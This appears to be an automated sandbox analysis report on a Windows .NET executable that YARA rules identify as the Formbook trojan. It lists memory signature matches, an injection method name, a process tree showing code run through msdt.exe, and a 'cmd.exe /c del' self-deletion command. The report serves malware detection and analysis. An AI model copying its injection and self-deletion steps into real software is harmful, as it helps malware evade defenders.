Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A41460	6_2_04A41460
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AED5B0	6_2_04AED5B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B195C3	6_2_04B195C3
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B07571	6_2_04B07571
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B016CC	6_2_04B016CC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A95630	6_2_04A95630
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B0F7B0	6_2_04B0F7B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B0F0E0	6_2_04B0F0E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B070E9	6_2_04B070E9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AFF0CC	6_2_04AFF0CC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A570C0	6_2_04A570C0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A5B1B0	6_2_04A5B1B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A8516C	6_2_04A8516C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A3F172	6_2_04A3F172
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B1B16B	6_2_04B1B16B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A552A0	6_2_04A552A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AF12ED	6_2_04AF12ED
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A6D2F0	6_2_04A6D2F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A6B2C0	6_2_04A6B2C0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A9739A	6_2_04A9739A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B0132D	6_2_04B0132D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A3D34C	6_2_04A3D34C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B0FCF2	6_2_04B0FCF2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AC9C32	6_2_04AC9C32
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A6FDC0	6_2_04A6FDC0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B07D73	6_2_04B07D73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A53D40	6_2_04A53D40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B01D5A	6_2_04B01D5A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A59EB0	6_2_04A59EB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B0FFB1	6_2_04B0FFB1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A51F92	6_2_04A51F92
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A13FD2	6_2_04A13FD2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A13FD5	6_2_04A13FD5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B0FF09	6_2_04B0FF09
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A538E0	6_2_04A538E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04ABD800	6_2_04ABD800
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AE5910	6_2_04AE5910
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A59950	6_2_04A59950
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A6B950	6_2_04A6B950
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AEDAAC	6_2_04AEDAAC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A95AA0	6_2_04A95AA0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AF1AA3	6_2_04AF1AA3
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AFDAC6	6_2_04AFDAC6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AC3A6C	6_2_04AC3A6C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B07A46	6_2_04B07A46
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B0FA49	6_2_04B0FA49
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A6FB80	6_2_04A6FB80
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04A8DBF9	6_2_04A8DBF9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04AC5BF0	6_2_04AC5BF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04B0FB76	6_2_04B0FB76
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0081D5A6	6_2_0081D5A6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0081ECC1	6_2_0081ECC1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_00802D87	6_2_00802D87
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_00802D90	6_2_00802D90
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0081EEF4	6_2_0081EEF4
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_00809E60	6_2_00809E60
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_00802FB0	6_2_00802FB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0475A036	6_2_0475A036
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04752D02	6_2_04752D02
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0475E5CD	6_2_0475E5CD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04751082	6_2_04751082
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04758912	6_2_04758912
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0475B232	6_2_0475B232
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04755B30	6_2_04755B30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04755B32	6_2_04755B32

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: String function: 0118B970 appears 262 times
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: String function: 011E7E54 appears 107 times
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: String function: 011D5130 appears 58 times
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: String function: 0120EA12 appears 86 times
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: String function: 0121F290 appears 103 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 04A97E54 appears 107 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 008BE523 appears 31 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 04A85130 appears 58 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 008899E8 appears 885 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 04ACF290 appears 103 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 04A3B970 appears 262 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 008819DB appears 34 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 04ABEA12 appears 86 times

Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1660916542.0000000003D2E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs mQY9ka5sW6hv2Ri.exe
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1658764239.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs mQY9ka5sW6hv2Ri.exe
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000000.1631739652.0000000000682000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFXDX.exe, vs mQY9ka5sW6hv2Ri.exe
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1664185923.00000000079D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs mQY9ka5sW6hv2Ri.exe
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1663385257.0000000007000000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRT.dll. vs mQY9ka5sW6hv2Ri.exe
Source: mQY9ka5sW6hv2Ri.exe, 00000004.00000002.1771720567.00000000010F0000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamemsdt.exej% vs mQY9ka5sW6hv2Ri.exe
Source: mQY9ka5sW6hv2Ri.exe, 00000004.00000002.1771924925.000000000128D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs mQY9ka5sW6hv2Ri.exe
Source: mQY9ka5sW6hv2Ri.exe	Binary or memory string: OriginalFilenameFXDX.exe, vs mQY9ka5sW6hv2Ri.exe

Source: mQY9ka5sW6hv2Ri.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.4103236234.000000000FBD4000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: mQY9ka5sW6hv2Ri.exe PID: 6912, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: mQY9ka5sW6hv2Ri.exe PID: 2676, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msdt.exe PID: 6956, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: mQY9ka5sW6hv2Ri.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, xAjfVuKcAf4Og71LT4.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, xAjfVuKcAf4Og71LT4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, xAjfVuKcAf4Og71LT4.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, QdNndQQ6nZ5EJDtnt1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, xAjfVuKcAf4Og71LT4.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, xAjfVuKcAf4Og71LT4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, xAjfVuKcAf4Og71LT4.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, QdNndQQ6nZ5EJDtnt1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, xAjfVuKcAf4Og71LT4.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, xAjfVuKcAf4Og71LT4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3f003c0.5.raw.unpack, xAjfVuKcAf4Og71LT4.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.mQY9ka5sW6hv2Ri.exe.3e905a0.6.raw.unpack, QdNndQQ6nZ5EJDtnt1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.mQY9ka5sW6hv2Ri.exe.2d14620.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.mQY9ka5sW6hv2Ri.exe.7120000.8.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.mQY9ka5sW6hv2Ri.exe.2d357f0.4.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.evad.winEXE@524/1@12/6

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_0088A006 CoCreateInstance,SysAllocString,SysFreeString,

6_2_0088A006

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_008B1DB3 FindResourceW,GetLastError,LoadResource,GetLastError,LockResource,SizeofResource,GetLastError,GlobalAlloc,GetLastError,GlobalLock,GetLastError,memcpy,CreateStreamOnHGlobal,FreeResource,GlobalUnlock,GlobalFree,

6_2_008B1DB3

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mQY9ka5sW6hv2Ri.exe.log

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03

Source: mQY9ka5sW6hv2Ri.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: mQY9ka5sW6hv2Ri.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: mQY9ka5sW6hv2Ri.exe

ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe "C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process created: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe "C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process created: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe "C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process created: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe "C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process created: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe "C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process created: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe "C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process created: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe "C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe"	Jump to behavior

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Section loaded: windowscodecs.dll	Jump to behavior
